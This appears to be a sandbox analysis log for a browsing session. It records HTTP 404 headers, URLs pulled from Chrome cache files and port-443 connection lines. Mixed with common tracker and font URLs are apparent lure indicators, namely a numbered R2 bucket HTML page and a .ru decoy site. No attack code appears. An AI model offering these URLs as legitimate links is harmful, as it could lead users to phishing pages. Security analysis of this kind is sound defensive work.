Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 30 Aug 2024 16:16:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closecontent-security-policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requestsx-dns-prefetch-control: offexpect-ct: max-age=0x-frame-options: SAMEORIGINstrict-transport-security: max-age=15552000; includeSubDomainsx-download-options: noopenx-content-type-options: nosniffx-permitted-cross-domain-policies: nonereferrer-policy: no-referrerx-xss-protection: 0vary: Originaccess-control-allow-credentials: trueCache-Control: max-age=14400CF-Cache-Status: HITReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VMcD8TIpgo1vLufL0eO%2FLbrmD%2F4y8myg1aFc5fyHOhEzqeqXQ8iwKgrJetqL1cToVrrkUgktt7Cy6v7otpWNf6VA35cycnyf1tkJVPcuEAHp9A%2BXOWTAhUga"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bb615468c600cb0-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 30 Aug 2024 16:16:16 GMTContent-Type: text/htmlContent-Length: 27150Connection: closeServer: cloudflareCF-RAY: 8bb615967e188cd4-EWR
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 30 Aug 2024 16:16:23 GMTContent-Type: text/htmlContent-Length: 27150Connection: closeServer: cloudflareCF-RAY: 8bb615c138628c17-EWR
Source: chromecache_443.2.dr, chromecache_478.2.dr String found in binary or memory: http://feross.org
Source: chromecache_642.2.dr, chromecache_670.2.dr String found in binary or memory: http://github.com/garycourt/murmurhash-js
Source: chromecache_435.2.dr, chromecache_341.2.dr String found in binary or memory: http://hammerjs.github.io/
Source: chromecache_642.2.dr, chromecache_670.2.dr String found in binary or memory: http://opensource.org/licenses/MIT
Source: chromecache_642.2.dr, chromecache_670.2.dr String found in binary or memory: http://sites.google.com/site/murmurhash/
Source: chromecache_797.2.dr String found in binary or memory: http://stackoverflow.com/questions/16092114/background-size-differs-in-internet-explorer)
Source: chromecache_446.2.dr String found in binary or memory: http://typekit.com/eulas/00000000000000007735dac8
Source: chromecache_446.2.dr String found in binary or memory: http://typekit.com/eulas/00000000000000007735dacd
Source: chromecache_446.2.dr String found in binary or memory: http://typekit.com/eulas/00000000000000007735dad8
Source: chromecache_446.2.dr String found in binary or memory: http://typekit.com/eulas/00000000000000007735dada
Source: chromecache_733.2.dr, chromecache_403.2.dr String found in binary or memory: http://underscorejs.org
Source: chromecache_642.2.dr, chromecache_434.2.dr, chromecache_683.2.dr, chromecache_670.2.dr String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: chromecache_642.2.dr, chromecache_670.2.dr String found in binary or memory: http://www.lalit.org/lab/javascript-css-font-detect/
Source: chromecache_398.2.dr, chromecache_622.2.dr String found in binary or memory: https://a.quora.com/qevents.js
Source: chromecache_572.2.dr, chromecache_488.2.dr String found in binary or memory: https://accounts.google.com/gsi/
Source: chromecache_572.2.dr, chromecache_488.2.dr String found in binary or memory: https://accounts.google.com/gsi/button
Source: chromecache_572.2.dr, chromecache_488.2.dr String found in binary or memory: https://accounts.google.com/gsi/fedcm.json
Source: chromecache_572.2.dr, chromecache_488.2.dr String found in binary or memory: https://accounts.google.com/gsi/fedcmcsp?client_id=
Source: chromecache_572.2.dr, chromecache_488.2.dr String found in binary or memory: https://accounts.google.com/gsi/iframe/select
Source: chromecache_488.2.dr String found in binary or memory: https://accounts.google.com/gsi/log
Source: chromecache_572.2.dr, chromecache_488.2.dr String found in binary or memory: https://accounts.google.com/gsi/revoke
Source: chromecache_572.2.dr, chromecache_488.2.dr String found in binary or memory: https://accounts.google.com/gsi/select
Source: chromecache_572.2.dr, chromecache_488.2.dr String found in binary or memory: https://accounts.google.com/gsi/status
Source: chromecache_572.2.dr, chromecache_488.2.dr String found in binary or memory: https://accounts.google.com/gsi/style
Source: chromecache_572.2.dr, chromecache_488.2.dr String found in binary or memory: https://accounts.google.com/o/oauth2/iframe
Source: chromecache_488.2.dr String found in binary or memory: https://accounts.google.com/o/oauth2/v2/auth
Source: chromecache_378.2.dr String found in binary or memory: https://ad.doubleclick.net
Source: chromecache_398.2.dr, chromecache_622.2.dr, chromecache_568.2.dr, chromecache_378.2.dr String found in binary or memory: https://ade.googlesyndication.com
Source: chromecache_378.2.dr String found in binary or memory: https://adservice.google.com/pagead/regclk?
Source: chromecache_586.2.dr, chromecache_313.2.dr, chromecache_542.2.dr String found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
Source: chromecache_773.2.dr, chromecache_443.2.dr, chromecache_840.2.dr, chromecache_478.2.dr String found in binary or memory: https://aws-amplify.github.io/docs/js/authentication#amplify-project-setup
Source: chromecache_773.2.dr, chromecache_443.2.dr, chromecache_840.2.dr, chromecache_478.2.dr String found in binary or memory: https://aws-amplify.github.io/docs/js/authentication#configure-your-app
Source: chromecache_352.2.dr, chromecache_595.2.dr, chromecache_603.2.dr, chromecache_807.2.dr, chromecache_594.2.dr, chromecache_566.2.dr, chromecache_398.2.dr, chromecache_726.2.dr, chromecache_834.2.dr, chromecache_525.2.dr, chromecache_622.2.dr, chromecache_784.2.dr, chromecache_615.2.dr, chromecache_339.2.dr, chromecache_568.2.dr, chromecache_378.2.dr String found in binary or memory: https://cct.google/taggy/agent.js
Source: chromecache_429.2.dr String found in binary or memory: https://cdn.jsdelivr.net/npm/
Source: chromecache_429.2.dr String found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
Source: chromecache_646.2.dr String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Source: chromecache_646.2.dr String found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js
Source: chromecache_429.2.dr String found in binary or memory: https://code.jquery.com/jquery-3.5.1.slim.min.js
Source: chromecache_398.2.dr, chromecache_622.2.dr String found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: chromecache_511.2.dr, chromecache_571.2.dr String found in binary or memory: https://conversation.api.drift.com
Source: chromecache_511.2.dr, chromecache_571.2.dr String found in binary or memory: https://customer.api.drift.com
Source: chromecache_317.2.dr String found in binary or memory: https://developers.cloudflare.com/r2/data-access/public-buckets/
Source: chromecache_572.2.dr, chromecache_488.2.dr String found in binary or memory: https://developers.google.com/identity/gsi/web/guides/fedcm-migration
Source: chromecache_572.2.dr, chromecache_488.2.dr String found in binary or memory: https://developers.google.com/identity/gsi/web/guides/fedcm-migration?s=dc#cross_origin)
Source: chromecache_572.2.dr, chromecache_488.2.dr String found in binary or memory: https://developers.google.com/identity/gsi/web/guides/fedcm-migration?s=dc#display_moment
Source: chromecache_572.2.dr, chromecache_488.2.dr String found in binary or memory: https://developers.google.com/identity/gsi/web/guides/fedcm-migration?s=dc#skipped_moment
Source: chromecache_478.2.dr String found in binary or memory: https://docs.amplify.aws/lib/troubleshooting/upgrading/q/platform/js)
Source: chromecache_739.2.dr, chromecache_417.2.dr String found in binary or memory: https://feross.org
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/dmsans/v15/rP2Wp2ywxg089UriCZaSExd86J3t9jz86MvyyKK58VXh.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/dmsans/v15/rP2Wp2ywxg089UriCZaSExd86J3t9jz86MvyyKy58Q.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/dmsans/v15/rP2Yp2ywxg089UriI5-g4vlH9VoD8Cmcqbu0-K4.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/dmsans/v15/rP2Yp2ywxg089UriI5-g4vlH9VoD8Cmcqbu6-K6h9Q.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u-w4BMUTPHjxsIPx-mPCLQ7A.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u-w4BMUTPHjxsIPx-oPCI.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHh30AUi-qJCY.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHh30AXC-q.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHjxsAUi-qJCY.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHjxsAXC-q.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh50XSwaPGR_p.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh50XSwiPGQ.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh6UVSwaPGR_p.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh6UVSwiPGQ.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh7USSwaPGR_p.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh7USSwiPGQ.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI3wi_FQft1dw.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI3wi_Gwft.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI5wq_FQft1dw.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI5wq_Gwft.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI9w2_FQft1dw.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI9w2_Gwft.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjx4wXg.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjxAwXjeu.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizYRExUiTo99u79D0e0w8mIEDQ.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizYRExUiTo99u79D0e0x8mI.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizYRExUiTo99u79D0e0ycmIEDQ.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizYRExUiTo99u79D0e0ysmIEDQ.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79D0-ExdGM.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79D0KExQ.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79D0aExdGM.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79D0yExdGM.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizdRExUiTo99u79D0e8fOydIRUdwzM.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizdRExUiTo99u79D0e8fOydIhUdwzM.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizdRExUiTo99u79D0e8fOydKxUdwzM.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizdRExUiTo99u79D0e8fOydLxUd.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizfRExUiTo99u79B_mh0O6tLQ.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizfRExUiTo99u79B_mh0OCtLQ0Z.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizfRExUiTo99u79B_mh0OOtLQ0Z.woff2)
Source: chromecache_437.2.dr String found in binary or memory: https://fonts.gstatic.com/s/ptsans/v17/jizfRExUiTo99u79B_mh0OqtLQ0Z.woff2)
Source: chromecache_381.2.dr, chromecache_322.2.dr, chromecache_709.2.dr, chromecache_539.2.dr, chromecache_314.2.dr, chromecache_754.2.dr String found in binary or memory: https://forms-as-a-service.capstage.net
Source: chromecache_381.2.dr, chromecache_322.2.dr, chromecache_709.2.dr, chromecache_539.2.dr, chromecache_314.2.dr, chromecache_754.2.dr String found in binary or memory: https://forms-as-a-service.capterra.com
Source: chromecache_733.2.dr, chromecache_403.2.dr String found in binary or memory: https://github.com/bkwld/tram
Source: chromecache_807.2.dr, chromecache_398.2.dr, chromecache_525.2.dr, chromecache_622.2.dr String found in binary or memory: https://github.com/krux/postscribe/blob/master/LICENSE.
Source: chromecache_773.2.dr, chromecache_840.2.dr String found in binary or memory: https://github.com/lancedikson/bowser
Source: chromecache_558.2.dr, chromecache_371.2.dr String found in binary or memory: https://github.com/microsoft/clarity
Source: chromecache_339.2.dr String found in binary or memory: https://google.com
Source: chromecache_339.2.dr String found in binary or memory: https://googleads.g.doubleclick.net
Source: chromecache_713.2.dr String found in binary or memory: https://img.pblc.it/i/300x0x8.f.DOST/x/created_in_publicate.png
Source: chromecache_713.2.dr String found in binary or memory: https://img.pblc.it/i/600x315x9.coords.DO.25
Source: chromecache_408.2.dr, chromecache_591.2.dr String found in binary or memory: https://itunes.apple.com/us/app/messenger/id454638411
Source: chromecache_511.2.dr, chromecache_571.2.dr String found in binary or memory: https://js.driftt.com
Source: chromecache_572.2.dr, chromecache_488.2.dr String found in binary or memory: https://meet.google.com
Source: chromecache_511.2.dr, chromecache_571.2.dr String found in binary or memory: https://metrics.api.drift.com
Source: chromecache_572.2.dr, chromecache_488.2.dr String found in binary or memory: https://oauth2.googleapis.com/revoke
Source: chromecache_446.2.dr String found in binary or memory: https://p.typekit.net/p.css?s=1&k=urt5zuu&ht=tk&f=7180.7181.7182.7183&a=108349166&app=typekit&e=css
Source: chromecache_378.2.dr String found in binary or memory: https://pagead2.googlesyndication.com
Source: chromecache_505.2.dr String found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204/?id=turtlex_join_ig&tx_jig=$
Source: chromecache_352.2.dr, chromecache_595.2.dr, chromecache_603.2.dr, chromecache_807.2.dr, chromecache_594.2.dr, chromecache_566.2.dr, chromecache_398.2.dr, chromecache_726.2.dr, chromecache_834.2.dr, chromecache_525.2.dr, chromecache_622.2.dr, chromecache_784.2.dr, chromecache_615.2.dr, chromecache_339.2.dr, chromecache_568.2.dr, chromecache_378.2.dr String found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
Source: chromecache_337.2.dr String found in binary or memory: https://pblc.me/pub/40f029dddc28e3
Source: chromecache_408.2.dr, chromecache_591.2.dr String found in binary or memory: https://play.google.com/store/apps/details?id=com.facebook.orca
Source: chromecache_704.2.dr String found in binary or memory: https://prod.adobeccstatic.com/License/LICENSE.txt
Source: chromecache_713.2.dr String found in binary or memory: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.html
Source: chromecache_713.2.dr String found in binary or memory: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=pow
Source: chromecache_505.2.dr String found in binary or memory: https://publickeyservice.msmt.gcp.privacysandboxservices.com
Source: chromecache_622.2.dr String found in binary or memory: https://px.ads.linkedin.com/collect?
Source: chromecache_622.2.dr String found in binary or memory: https://q.quora.com/_/ad/
Source: chromecache_429.2.dr String found in binary or memory: https://quantumspirel.ru/#
Source: chromecache_429.2.dr String found in binary or memory: https://quantumspirel.ru/#about
Source: chromecache_429.2.dr String found in binary or memory: https://quantumspirel.ru/#classic-cars
Source: chromecache_429.2.dr String found in binary or memory: https://quantumspirel.ru/#contact
Source: chromecache_429.2.dr String found in binary or memory: https://quantumspirel.ru/#electric-vehicles
Source: chromecache_429.2.dr String found in binary or memory: https://quantumspirel.ru/#faq
Source: chromecache_429.2.dr String found in binary or memory: https://quantumspirel.ru/#learn-more
Source: chromecache_429.2.dr String found in binary or memory: https://quantumspirel.ru/#modern-supercars
Source: chromecache_429.2.dr String found in binary or memory: https://quantumspirel.ru/#privacy
Source: chromecache_429.2.dr String found in binary or memory: https://quantumspirel.ru/#services
Source: chromecache_429.2.dr String found in binary or memory: https://quantumspirel.ru/#terms
Source: chromecache_398.2.dr, chromecache_622.2.dr String found in binary or memory: https://reveal.clearbit.com/v1/companies/reveal?authorization=
Source: chromecache_318.2.dr, chromecache_569.2.dr String found in binary or memory: https://sketch.com
Source: chromecache_807.2.dr, chromecache_398.2.dr, chromecache_525.2.dr, chromecache_622.2.dr String found in binary or memory: https://snap.licdn.com/li.lms-analytics/insight.min.js
Source: chromecache_429.2.dr String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js
Source: chromecache_807.2.dr, chromecache_525.2.dr String found in binary or memory: https://static.hotjar.com/c/hotjar-
Source: chromecache_495.2.dr, chromecache_448.2.dr String found in binary or memory: https://static.woopra.com/js/w.js.LICENSE.txt
Source: chromecache_595.2.dr, chromecache_603.2.dr, chromecache_594.2.dr, chromecache_726.2.dr, chromecache_834.2.dr, chromecache_784.2.dr String found in binary or memory: https://stats.g.doubleclick.net/g/collect
Source: chromecache_542.2.dr String found in binary or memory: https://stats.g.doubleclick.net/j/collect
Source: chromecache_586.2.dr, chromecache_313.2.dr, chromecache_542.2.dr String found in binary or memory: https://tagassistant.google.com/
Source: chromecache_738.2.dr, chromecache_556.2.dr String found in binary or memory: https://tailwindcss.com
Source: chromecache_511.2.dr, chromecache_571.2.dr String found in binary or memory: https://targeting.api.drift.com
Source: chromecache_352.2.dr, chromecache_505.2.dr, chromecache_595.2.dr, chromecache_603.2.dr, chromecache_807.2.dr, chromecache_594.2.dr, chromecache_566.2.dr, chromecache_398.2.dr, chromecache_726.2.dr, chromecache_834.2.dr, chromecache_525.2.dr, chromecache_622.2.dr, chromecache_784.2.dr, chromecache_615.2.dr, chromecache_339.2.dr, chromecache_568.2.dr, chromecache_378.2.dr String found in binary or memory: https://td.doubleclick.net
Source: chromecache_505.2.dr String found in binary or memory: https://td.doubleclick.net/td/bjs
Source: chromecache_505.2.dr String found in binary or memory: https://td.doubleclick.net/td/bts
Source: chromecache_505.2.dr String found in binary or memory: https://td.doubleclick.net/td/buyer.wasm
Source: chromecache_505.2.dr String found in binary or memory: https://td.doubleclick.net/td/update?ig_name=4s1810143887.1725034608
Source: chromecache_505.2.dr String found in binary or memory: https://tdsf.doubleclick.net/td/adfetch/gda?adg_id=147036195015
Source: chromecache_505.2.dr String found in binary or memory: https://tdsf.doubleclick.net/td/adfetch/gda?adg_id=147728964426
Source: chromecache_398.2.dr, chromecache_622.2.dr String found in binary or memory: https://unpkg.com/web-vitals/dist/web-vitals.iife.js
Source: chromecache_434.2.dr, chromecache_683.2.dr String found in binary or memory: https://use.typekit.net
Source: chromecache_446.2.dr String found in binary or memory: https://use.typekit.net/af/5c07ba/00000000000000007735dad8/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_446.2.dr String found in binary or memory: https://use.typekit.net/af/5c07ba/00000000000000007735dad8/30/d?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_446.2.dr String found in binary or memory: https://use.typekit.net/af/5c07ba/00000000000000007735dad8/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_446.2.dr String found in binary or memory: https://use.typekit.net/af/650f2d/00000000000000007735dada/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_446.2.dr String found in binary or memory: https://use.typekit.net/af/650f2d/00000000000000007735dada/30/d?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_446.2.dr String found in binary or memory: https://use.typekit.net/af/650f2d/00000000000000007735dada/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_446.2.dr String found in binary or memory: https://use.typekit.net/af/95bf80/00000000000000007735dacd/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_446.2.dr String found in binary or memory: https://use.typekit.net/af/95bf80/00000000000000007735dacd/30/d?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_446.2.dr String found in binary or memory: https://use.typekit.net/af/95bf80/00000000000000007735dacd/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_446.2.dr String found in binary or memory: https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/a?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_446.2.dr String found in binary or memory: https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/d?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_446.2.dr String found in binary or memory: https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8
Source: chromecache_717.2.dr, chromecache_502.2.dr String found in binary or memory: https://www.capterra.com
Source: chromecache_798.2.dr, chromecache_813.2.dr String found in binary or memory: https://www.capterra.com/legal/cookie-policy/
Source: chromecache_317.2.dr String found in binary or memory: https://www.cloudflare.com/favicon.ico
Source: chromecache_819.2.dr, chromecache_815.2.dr String found in binary or memory: https://www.fullstory.com/legal/terms-and-conditions/
Source: chromecache_807.2.dr, chromecache_398.2.dr, chromecache_525.2.dr, chromecache_622.2.dr String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: chromecache_586.2.dr, chromecache_313.2.dr, chromecache_542.2.dr String found in binary or memory: https://www.google-analytics.com/debug/bootstrap?id=
Source: chromecache_586.2.dr, chromecache_313.2.dr, chromecache_542.2.dr String found in binary or memory: https://www.google-analytics.com/gtm/js?id=
Source: chromecache_586.2.dr, chromecache_313.2.dr, chromecache_542.2.dr String found in binary or memory: https://www.google.%/ads/ga-audiences
Source: chromecache_378.2.dr String found in binary or memory: https://www.google.com
Source: chromecache_586.2.dr, chromecache_313.2.dr, chromecache_542.2.dr String found in binary or memory: https://www.google.com/ads/ga-audiences
Source: chromecache_508.2.dr, chromecache_440.2.dr, chromecache_680.2.dr, chromecache_543.2.dr String found in binary or memory: https://www.google.com/pagead/1p-user-list/1072635088/?random
Source: chromecache_339.2.dr, chromecache_568.2.dr, chromecache_378.2.dr String found in binary or memory: https://www.googleadservices.com
Source: chromecache_378.2.dr String found in binary or memory: https://www.googletagmanager.com
Source: chromecache_398.2.dr, chromecache_622.2.dr, chromecache_615.2.dr, chromecache_339.2.dr String found in binary or memory: https://www.googletagmanager.com/a?
Source: chromecache_398.2.dr, chromecache_622.2.dr, chromecache_568.2.dr, chromecache_378.2.dr String found in binary or memory: https://www.googletagmanager.com/dclk/ns/v1.js
Source: chromecache_586.2.dr, chromecache_313.2.dr, chromecache_542.2.dr String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
Source: chromecache_398.2.dr, chromecache_622.2.dr, chromecache_615.2.dr, chromecache_339.2.dr String found in binary or memory: https://www.googletagmanager.com/static/service_worker/
Source: chromecache_408.2.dr, chromecache_591.2.dr String found in binary or memory: https://www.internalfb.com/intern/invariant/
Source: chromecache_595.2.dr, chromecache_603.2.dr, chromecache_594.2.dr, chromecache_726.2.dr, chromecache_834.2.dr, chromecache_784.2.dr String found in binary or memory: https://www.merchant-center-analytics.goog
Source: chromecache_595.2.dr, chromecache_603.2.dr, chromecache_594.2.dr, chromecache_398.2.dr, chromecache_726.2.dr, chromecache_834.2.dr, chromecache_622.2.dr, chromecache_784.2.dr String found in binary or memory: https://www.youtube.com/iframe_api
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50211 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50257 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50452 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 50360 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown Network traffic detected: HTTP traffic on port 50417 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50325 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50292 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown Network traffic detected: HTTP traffic on port 50359 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown Network traffic detected: HTTP traffic on port 50189 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50303 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50269 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 50439 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49955
